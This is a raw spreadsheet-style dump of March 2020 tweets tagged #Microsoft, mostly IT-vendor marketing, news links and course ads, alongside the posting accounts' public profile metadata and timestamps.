    <t>{'id': 760555493861437441, 'id_str': '760555493861437441', 'name': 'Suite Engine LLC', 'screen_name': 'SuiteEngine', 'location': 'US and Canada', 'description': 'Creating a seamless, integrated experience across the systems and processes that run your business. Powered by Microsoft Dynamics 365 Business Central.', 'url': 'https://t.co/xGzqPQYEsv', 'entities': {'url': {'urls': [{'url': 'https://t.co/xGzqPQYEsv', 'expanded_url': 'https://suiteengine.com/', 'display_url': 'suiteengine.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 128, 'friends_count': 144, 'listed_count': 2, 'created_at': 'Tue Aug 02 19:18:55 +0000 2016', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 352,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'http://pbs.twimg.com/profile_images/1123959516738007044/Rrj-O8ZN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1123959516738007044/Rrj-O8ZN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/760555493861437441/1556807832',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</si>
  <si>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19:50:17 +0000 2020</t>
  </si>
  <si>
    <t>#Facebook, #Google, #Microsoft, #Adobe pull out of more conferences as #coronavirus spreads
https://t.co/lhc1HCi9ps</t>
  </si>
  <si>
    <t>{'id': 174317961, 'id_str': '174317961', 'name': 'Arun Santhosh', 'screen_name': 'arunsanthosh04', 'location': 'Dubai', 'description': '#SEM | #PPC | #Online #Marketing | #Digital #Marketing #Specialist | #SEO | #SMO | #Email #Marketing | #Affiliate #Marketing | #App #Marketing | #ASO', 'url': 'http://t.co/vveMWqqQ', 'entities': {'url': {'urls': [{'url': 'http://t.co/vveMWqqQ', 'expanded_url': 'http://about.me/arun_santhosh', 'display_url': 'about.me/arun_santhosh', 'indices': [0, 20]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 940, 'friends_count': 2344, 'listed_count': 87, 'created_at': 'Tue Aug 03 16:57:42 +0000 2010', 'favourites_count': 308, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2805,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'http://pbs.twimg.com/profile_images/912964123603980288/iuqhqO6D_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/912964123603980288/iuqhqO6D_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/174317961/1400314018', 'profile_link_color': '1B95E0',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</si>
  <si>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19:47:54 +0000 2020</t>
  </si>
  <si>
    <t>Day 57/366. 2002/5/1.
#VideoGameCollection #Games #Gaming #Microsoft #Xbox #PlatinumHits #TheElderScrolls3Morrowind #BethesdaSoftworks @ Greensboro, North Carolina https://t.co/TrwaOWlK1M</t>
  </si>
  <si>
    <t>Tue Mar 03 19:47:18 +0000 2020</t>
  </si>
  <si>
    <t>Hey everyone, we have officially made our @discordapp server public, for any all to join.
If you would like to join the discord please click this link: https://t.co/JOCdgWib4f 
#discord #game #gamer #games #gaming #Xbox #XboxOne #Playstation #PC #tuesdayvibes #Microsoft #Sony</t>
  </si>
  <si>
    <t>{'id': 911072731487244288, 'id_str': '911072731487244288', 'name': 'Nuclear Fusion Gaming', 'screen_name': 'NuclearFG', 'location': 'Someplace Gaming', 'description': 'Nuclear Fusion Gaming is a gaming community on Xbox &amp; PS4. We prioritize fun rather than skill. Want to join? DM us for recruitment. Founded in 2013.', 'url': 'https://t.co/NCXQJS7XvQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/NCXQJS7XvQ', 'expanded_url': 'http://nuclearfusiongaming.carrd.co', 'display_url': 'nuclearfusiongaming.carrd.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 136, 'friends_count': 49, 'listed_count': 1, 'created_at': 'Fri Sep 22 03:40:40 +0000 2017', 'favourites_count': 2093, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1882, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235064689408737282/R3V50740_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235064689408737282/R3V50740_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/911072731487244288/1579668934',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</si>
  <si>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19:45:12 +0000 2020</t>
  </si>
  <si>
    <t>Learn Excel From Scratch - https://t.co/VKBH3arl1b #Microsoft #OfficeProductivity
https://t.co/VKBH3arl1b</t>
  </si>
  <si>
    <t>Tue Mar 03 19:41:55 +0000 2020</t>
  </si>
  <si>
    <t>If you look past the prejudices about #Microsoft's browser,you will be pleasantly surprised with "New #Edge".At first I was a sceptic too, but after using it for a few weeks, my opinion has turned around completely. Fast,customizable,Chrome extensions... https://t.co/hbjBYUbZIU</t>
  </si>
  <si>
    <t>{'id': 1224248661074497542, 'id_str': '1224248661074497542', 'name': 'Jeroen.Cools', 'screen_name': 'cools_jeroen', 'location': 'Belgium', 'description': "Passionate, but a bit chaotic, IT manager and teacher.\nHas more Raspberry Pi's than time to use them.\nLoves Microsoft OneNote and Teams.\nTravels when possible.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 16, 'listed_count': 0, 'created_at': 'Mon Feb 03 08:30:13 +0000 2020', 'favourites_count': 12,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'http://pbs.twimg.com/profile_images/1230895757928079361/RHZkv70L_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230895757928079361/RHZkv70L_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1224248661074497542/1582303934',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</si>
  <si>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19:41:43 +0000 2020</t>
  </si>
  <si>
    <t>I don't use #Microsoft #OneDrive, yet it was using 23% of my 12 core processor.  I terminated that process asap. Thanks #Windows.</t>
  </si>
  <si>
    <t>{'id': 18520462, 'id_str': '18520462', 'name': 'Brian Ernst', 'screen_name': 'leetNightshade', 'location': 'Los Angeles, CA', 'description': 'Gameplay Engineer @singularity_six. Previously @Treyarch, etc. Open platform advocate, #Arch/#Manjaro/#Ubuntu at home. https://t.co/ZaM5fJq3bZ', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/ZaM5fJq3bZ', 'expanded_url': 'https://linkedin.com/in/leetnightshade/', 'display_url': 'linkedin.com/in/leetnightshâ€¦', 'indices': [119, 142]}]}}, 'protected': False, 'followers_count': 858, 'friends_count': 888, 'listed_count': 63, 'created_at': 'Thu Jan 01 01:01:09 +0000 2009', 'favourites_count': 5949, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5808, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '414242', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/264928367/mutatingfrenzy_tn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/264928367/mutatingfrenzy_tn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18520462/1398223156', 'profile_link_color': '8F1D8F', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '97BAD1', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 19:39:44 +0000 2020</t>
  </si>
  <si>
    <t>Do your #K12 students have the tools they need to be future-ready? Learn more about our affordable #Microsoft devices. Contact us to unlock the power of learning.#EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/dpQxEUo1DG</t>
  </si>
  <si>
    <t>{'id': 774412867, 'id_str': '774412867', 'name': 'KCHelpdesk', 'screen_name': 'KCHelpdesk', 'location': 'Kansas City Metro', 'description': 'Provider of IT solutions and services to the Greater Kansas City Metropolitan Area since 2005. Visit us in Prairie Village, KS or Independence, MO.', 'url': 'http://t.co/8dNu8MNNfN', 'entities': {'url': {'urls': [{'url': 'http://t.co/8dNu8MNNfN', 'expanded_url': 'http://www.kchelpdesk.com', 'display_url': 'kchelpdesk.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 146, 'friends_count': 620, 'listed_count': 3, 'created_at': 'Wed Aug 22 20:14:29 +0000 2012', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 112,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'http://pbs.twimg.com/profile_images/2606841248/gnf8ezzt1oay1hnq2wf5_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2606841248/gnf8ezzt1oay1hnq2wf5_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/774412867/1524761483',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</si>
  <si>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19:39:27 +0000 2020</t>
  </si>
  <si>
    <t>Hello #AIIM20! Were here at Booth #6 with @aaroncutlerkno1our demo superstar. Stop by today for a look at our end-to-end intelligent content automation platform! #Microsoft https://t.co/aciPjyKP76</t>
  </si>
  <si>
    <t>{'id': 62662702, 'id_str': '62662702', 'name': 'KnowledgeLake', 'screen_name': 'KnowledgeLake', 'location': 'St. Louis, MO, USA', 'description': 'We help organizations intelligently automate their most important document processes. Microsoft Preferred Partner, Content Services.', 'url': 'https://t.co/iCiv5Mzw1c', 'entities': {'url': {'urls': [{'url': 'https://t.co/iCiv5Mzw1c', 'expanded_url': 'http://knowledgelake.com', 'display_url': 'knowledgelake.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2475, 'friends_count': 2025, 'listed_count': 156, 'created_at': 'Tue Aug 04 00:09:06 +0000 2009', 'favourites_count': 1649, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5536,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'http://pbs.twimg.com/profile_images/1013854624510455808/vzGvhl7__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1013854624510455808/vzGvhl7__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/62662702/1551417164', 'profile_link_color': '3E8EDE',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</si>
  <si>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19:39:10 +0000 2020</t>
  </si>
  <si>
    <t>EXCEL at Work - Complete MS Excel Mastery Beginner to Pro - https://t.co/ATF7MBUuoV #Microsoft #OfficeProductivity
https://t.co/ATF7MBUuoV</t>
  </si>
  <si>
    <t>Tue Mar 03 19:38:42 +0000 2020</t>
  </si>
  <si>
    <t>Looking to double down on the #security of #Microsoft #Office365 subscription? Here are 7 one-click #security settings to get you started. https://t.co/4AHpWPTTno</t>
  </si>
  <si>
    <t>Tue Mar 03 19:38:01 +0000 2020</t>
  </si>
  <si>
    <t>Bad manners: ORDER BY ordinal number
https://t.co/CXTO4nqKpE
#tsql #sqldba #SQLServer #Microsoft #madeiradata https://t.co/vBU1ifkKk7</t>
  </si>
  <si>
    <t>Tue Mar 03 19:37:47 +0000 2020</t>
  </si>
  <si>
    <t>Knowledge is power--subscribing is empowerment. Discover how #Microsoft #Dynamics365 can empower your organization with the know-how and tools to gain sales momentum, boost productivity, and close more deals by subscribing to this channel. https://t.co/ZHJhwxmGYK</t>
  </si>
  <si>
    <t>{'id': 775389141349445632, 'id_str': '775389141349445632', 'name': 'The Bauen Group', 'screen_name': 'TheBauenGroup', 'location': 'Houston, TX', 'description': 'Houston, Texas-based technology consulting for small business. Focusing on customized web &amp; mobile development services, Office 365, and consulting solutions.', 'url': 'https://t.co/p2aRT5deqz', 'entities': {'url': {'urls': [{'url': 'https://t.co/p2aRT5deqz', 'expanded_url': 'http://www.bauensolutions.com', 'display_url': 'bauensolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 811, 'friends_count': 778, 'listed_count': 30, 'created_at': 'Mon Sep 12 17:42:32 +0000 2016', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 408,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'http://pbs.twimg.com/profile_images/775398255454662656/Hsuicaiw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/775398255454662656/Hsuicaiw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/775389141349445632/1473704572', 'profile_link_color': '1AAFAF',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</si>
  <si>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19:35:04 +0000 2020</t>
  </si>
  <si>
    <t>.@VentureBeat:  #PopeFrancis joins #IBM and #Microsoft in call for #AI #regulation
https://t.co/lBCfSnPHKA  #pope #tech #TechTuesday</t>
  </si>
  <si>
    <t>{'id': 22873354, 'id_str': '22873354', 'name': 'Justin Powell', 'screen_name': 'justinpowellweb', 'location': 'Morris County NJ, USA', 'description': 'Senior Manager, Digital Marketing and Technology at @erarealestate. Tweets are my own.', 'url': 'https://t.co/Y5ZD0SJsD4', 'entities': {'url': {'urls': [{'url': 'https://t.co/Y5ZD0SJsD4', 'expanded_url': 'http://www.justinpowellweb.com', 'display_url': 'justinpowellweb.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14229, 'friends_count': 14462, 'listed_count': 789, 'created_at': 'Thu Mar 05 03:30:38 +0000 2009', 'favourites_count': 2690, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16624,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'http://pbs.twimg.com/profile_images/683037535287832576/Ks_-wMYk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/683037535287832576/Ks_-wMYk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22873354/1536532684',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</si>
  <si>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19:34:34 +0000 2020</t>
  </si>
  <si>
    <t>Did We Just Attend the Last Trade Show Ever at RSA? https://t.co/T70YUrlHz9 #at&amp;amp;amp;t #breakingnews #facebook #google #ibm #mcafee #microsoft #op-ed #opencomputeproject(ocp) #opensource #security #topnews #verizon</t>
  </si>
  <si>
    <t>Tue Mar 03 19:34:04 +0000 2020</t>
  </si>
  <si>
    <t>Speeding Up Innovation in Latin America with Ciscos Internet for the Future https://t.co/ohUgVp8czG
For more info: https://t.co/eoozL6Y419 #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT https://t.co/2LzrDLKdYh</t>
  </si>
  <si>
    <t>Tue Mar 03 19:30:46 +0000 2020</t>
  </si>
  <si>
    <t>As a Microsoft #Gold Partner, we combine our deep industry expertise with the technology proficiency of #Microsoft. Book a free Microsoft Consultation today: https://t.co/KdJ4hJCiiN https://t.co/w06HQx5yG6</t>
  </si>
  <si>
    <t>Tue Mar 03 19:30:10 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Goes All-In On RPA (Robotic Process Automation): https://t.co/OOju8cWLlA
#Microsoft #RPA #Robotic #Automation #Tech #Future #TuesdayMorning #TuesdayThoughts https://t.co/FM1uBAJOaI</t>
  </si>
  <si>
    <t>{'id': 884821196222509058, 'id_str': '884821196222509058', 'name': 'ITWormHole', 'screen_name': 'ITWormHole', 'location': '', 'description': 'Your Source for #TechNews. #HybridCloud  #PrivateCloud #PublicCloud #CloudSecurity #IaaS #DRaaS #BRaaS #IoT #AI #Industry', 'url': 'https://t.co/1DfCksDrEK', 'entities': {'url': {'urls': [{'url': 'https://t.co/1DfCksDrEK', 'expanded_url': 'http://www.ITwormhole.com', 'display_url': 'ITwormhole.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 239, 'friends_count': 170, 'listed_count': 20, 'created_at': 'Tue Jul 11 17:06:27 +0000 2017', 'favourites_count': 112, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 843, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/884822801063960576/McRpJ_du_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/884822801063960576/McRpJ_du_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/884821196222509058/1499793274',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</si>
  <si>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19:30:08 +0000 2020</t>
  </si>
  <si>
    <t>Empowering the #NFL with #Microsoft Surface and Microsoft Teams https://t.co/emP3d7GSe7 https://t.co/r82v57idI7</t>
  </si>
  <si>
    <t>Tue Mar 03 19:30:03 +0000 2020</t>
  </si>
  <si>
    <t>For customers looking to leverage Microsoft Partner apps within Office 365 #Microsoft #cloud #Microsoft365 https://t.co/bzZExit4dM #MSFTAdvocate</t>
  </si>
  <si>
    <t>Tue Mar 03 19:30:01 +0000 2020</t>
  </si>
  <si>
    <t>We're hosting a #Microsoft Security CIE Pennsylvania on March 19th!
Join us to learn how @Microsoft365 Security Solutions can better protect users, applications, businesses &amp;amp; more. 
Sign up: https://t.co/hEKT0UXQJ3
@Microsoft #MicrosoftPartner #security #IT #tech https://t.co/xGxkLJsQ5a</t>
  </si>
  <si>
    <t>Tue Mar 03 19:28:23 +0000 2020</t>
  </si>
  <si>
    <t>Belgrade Nikola Tesla Airport serves over 5 million passengers per year. To help cut costs and pass the savings onto passengers, they're using the cloud to back up their data. #Microsoft https://t.co/SVDw1JD6Zf</t>
  </si>
  <si>
    <t>{'id': 1197016176582221824, 'id_str': '1197016176582221824', 'name': 'Ammolite Technology', 'screen_name': 'AmmoliteTech', 'location': 'Calgary, AB', 'description': 'Changing the way you look at technology. One company at a time.', 'url': 'https://t.co/jTsAEa88cW', 'entities': {'url': {'urls': [{'url': 'https://t.co/jTsAEa88cW', 'expanded_url': 'http://ammolitetech.com', 'display_url': 'ammolitetech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 8, 'listed_count': 0, 'created_at': 'Wed Nov 20 04:58:06 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 71, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1197018526348767232/k3xuvhex_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197018526348767232/k3xuvhex_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1197016176582221824/1574226173',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</si>
  <si>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19:28:12 +0000 2020</t>
  </si>
  <si>
    <t>The #Microsoft Puget Sound campus consists of 120 buildings and 15 million square feet of office space. Operating that much infrastructure is a huge undertaking and requires serious IT solutions. How are you managing your operations? https://t.co/e9LiJZeDXU</t>
  </si>
  <si>
    <t>{'id': 18035576, 'id_str': '18035576', 'name': 'Brent Knowles', 'screen_name': 'bknowles34', 'location': 'Colorado', 'description': 'Marketing | Cloud ERP | Digital Media | Family | Religion | Outdoors', 'url': 'https://t.co/YU0XMb0Wyl', 'entities': {'url': {'urls': [{'url': 'https://t.co/YU0XMb0Wyl', 'expanded_url': 'http://www.linkedin.com/in/brentknowles', 'display_url': 'linkedin.com/in/brentknowles', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 891, 'friends_count': 1005, 'listed_count': 41, 'created_at': 'Thu Dec 11 00:29:01 +0000 2008', 'favourites_count': 2303, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1921,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'http://pbs.twimg.com/profile_images/378800000846526803/50a941808c5278cb4ab4948d8ad39d11_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000846526803/50a941808c5278cb4ab4948d8ad39d11_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18035576/1402070687',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</si>
  <si>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19:27:43 +0000 2020</t>
  </si>
  <si>
    <t>#AI #Azure #microsoft     Is the cost of infrastructure keeping you from using AI to realize the full potential of your data? With Azure, you can pay for only the space you need and scale up as soon as you're ready. https://t.co/FJQL32jpSh</t>
  </si>
  <si>
    <t>Tue Mar 03 19:26:41 +0000 2020</t>
  </si>
  <si>
    <t>Think some companies are too old to transform? Not JB Hunt! See how the trucking company is reinventing itself with #Microsoft #Azure. Contact Liquid Mercury Solutions for help driving your company's digital transformation. https://t.co/G4896IcIRV</t>
  </si>
  <si>
    <t>Tue Mar 03 19:26:22 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that using resources available in #Microsoft #Teamworksolutions reduces downtime by 15%?           What are you waiting for? Contact us to learn how our teamwork tools from #Microsoft can help your business thrive. https://t.co/9FRevcnYl2</t>
  </si>
  <si>
    <t>{'id': 2853352067, 'id_str': '2853352067', 'name': 'ATSG', 'screen_name': 'TeamATSG', 'location': 'Briarcliff Manor, NY', 'description': "We're a tech-enabled IT Services &amp; Solution Provider, providing tangible business value through the sale &amp; delivery of Technology Solutions as a Service (TSaaS)", 'url': 'http://t.co/q0Dw6zhxDV', 'entities': {'url': {'urls': [{'url': 'http://t.co/q0Dw6zhxDV', 'expanded_url': 'http://www.atsg.net/', 'display_url': 'atsg.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 119, 'friends_count': 82, 'listed_count': 1, 'created_at': 'Fri Oct 31 14:49:07 +0000 2014', 'favourites_count': 37, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 911,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'http://pbs.twimg.com/profile_images/924414212901761024/np8hgS9e_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/924414212901761024/np8hgS9e_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2853352067/1509232517',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</si>
  <si>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19:25:27 +0000 2020</t>
  </si>
  <si>
    <t>Winning companies never stop #innovating. See how Michelin uses #Microsoft #Dynamics365 to serve customers in game-changing ways--at home. Talk about #transformation. #fieldservice https://t.co/qN3vBlVac8</t>
  </si>
  <si>
    <t>Tue Mar 03 19:25:10 +0000 2020</t>
  </si>
  <si>
    <t>Coming to Lagos soon. Azure and M365 Saturday. Stay tuned.....#mctbuzz  #mvpbuzz #mctnigeria #sharepoint #microsoft365 #azure #mct #yammer #o365 #microsoftazure #microsoftng #microsoftteams #sharepointonline #microsoft #microsoftplanner #mctnaijaug #flows #AzureSaturday https://t.co/uqNIVyKOwH</t>
  </si>
  <si>
    <t>{'id': 195225512, 'id_str': '195225512', 'name': 'Seyi Oluwawumiju (O)', 'screen_name': 'soluwawumiju', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 306, 'friends_count': 504, 'listed_count': 13, 'created_at': 'Sun Sep 26 03:59:01 +0000 2010', 'favourites_count': 50, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2760,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'http://pbs.twimg.com/profile_images/1102524632232615937/3fckWy7w_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1102524632232615937/3fckWy7w_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/195225512/1428596343',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</si>
  <si>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19:24:10 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/VoLx75VdBW</t>
  </si>
  <si>
    <t>Tue Mar 03 19:23:44 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft     Did you know that 83% of employees depend on technology to work together? The landscape of teamwork is changing. Check out this infographic to see how you can benefit from Teamworksolutions from Microsoft. https://t.co/ElMLl4ndHl</t>
  </si>
  <si>
    <t>Tue Mar 03 19:23:39 +0000 2020</t>
  </si>
  <si>
    <t>What can your inbox do for you? With the interconnected power of #Microsoft #Dynamics365, the information you need is only a click away. Saving you time and creating a better experience for your customers. https://t.co/WQozaMLbTJ</t>
  </si>
  <si>
    <t>{'id': 2550783522, 'id_str': '2550783522', 'name': 'Kosh Solutions', 'screen_name': 'KoshSolutions', 'location': 'New Mexico, USA', 'description': 'Leave IT to the Professionals! \nBorn in #LasCruces with offices in #Albuquerque #Farmington #Durango, #KoshSolutions is your go-to source for all your IT needs!', 'url': 'http://t.co/wc33essffi', 'entities': {'url': {'urls': [{'url': 'http://t.co/wc33essffi', 'expanded_url': 'http://koshsolutions.com/', 'display_url': 'koshsolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 371, 'friends_count': 860, 'listed_count': 8, 'created_at': 'Fri Jun 06 19:19:49 +0000 2014', 'favourites_count': 133, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 735,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'http://pbs.twimg.com/profile_images/982268924875063296/jo8l0Dbr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/982268924875063296/jo8l0Dbr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2550783522/1574870658',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</si>
  <si>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19:23:26 +0000 2020</t>
  </si>
  <si>
    <t>In the old days, @CliftonCoffeeRoasters had to print, scan, and fill out documents by hand. But since switching to #Teamworksolutions from #Microsoft, their employees work together on documents in a digital workspace. Check out this video for more. https://t.co/atmWBYgDrI</t>
  </si>
  <si>
    <t>Tue Mar 03 19:23:24 +0000 2020</t>
  </si>
  <si>
    <t>The global average cost of a #cyberattack is $3.6 million. Yikes! But don't worry, we can help protect your business. Check out this e-book from #Microsoft to identify the three most common threats: viruses, phishing, and ransomware. https://t.co/rVf1Wp7bpl</t>
  </si>
  <si>
    <t>{'id': 120206645, 'id_str': '120206645', 'name': 'Prophet Business Grp', 'screen_name': 'prophetbg', 'location': 'Winnipeg, MB', 'description': 'Winnipeg-based technology company specializing in Microsoft Dynamics GP, Microsoft Dynamics 365, Office 365 and Managed Services.', 'url': 'http://t.co/Ak8SoSPqXB', 'entities': {'url': {'urls': [{'url': 'http://t.co/Ak8SoSPqXB', 'expanded_url': 'http://www.prophet.ca/', 'display_url': 'prophet.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 463, 'friends_count': 401, 'listed_count': 64, 'created_at': 'Fri Mar 05 19:56:36 +0000 2010', 'favourites_count': 519, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3585, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227980276980043776/1B1YyRUE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227980276980043776/1B1YyRUE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/120206645/1475528862', 'profile_link_color': '844145', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 19:23:22 +0000 2020</t>
  </si>
  <si>
    <t>Turn prospects into business relationships with D365 Marketing 
#marketing #relationships #partners #teammates #microsoft #goldpartner #pagroupusa #customerengagement #customer #leadgeneration #dynamics https://t.co/XybmFFVTjy</t>
  </si>
  <si>
    <t>{'id': 2396339862, 'id_str': '2396339862', 'name': 'PA Group USA', 'screen_name': 'PAGroupUSA', 'location': 'Chattanooga, TN', 'description': 'Software and cloud services firm dedicated to helping companies grow stronger through the use of ERP, CRM, Managed Services, and Manufacturing Execution.', 'url': 'https://t.co/X7HbPowO5v', 'entities': {'url': {'urls': [{'url': 'https://t.co/X7HbPowO5v', 'expanded_url': 'http://www.pa-group.us', 'display_url': 'pa-group.us', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 295, 'friends_count': 699, 'listed_count': 13, 'created_at': 'Tue Mar 18 14:54:31 +0000 2014', 'favourites_count': 93, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 186,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'http://pbs.twimg.com/profile_images/1231964397683257345/xus_H0e__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231964397683257345/xus_H0e__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2396339862/1582558176',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</si>
  <si>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19:23:05 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that 83% of employees depend on technology to work together? The landscape of teamwork is changing--but we've got you covered. Check out this infographic to see how you can benefit from #Teamworksolutions from #Microsoft. https://t.co/uURaFxXImQ</t>
  </si>
  <si>
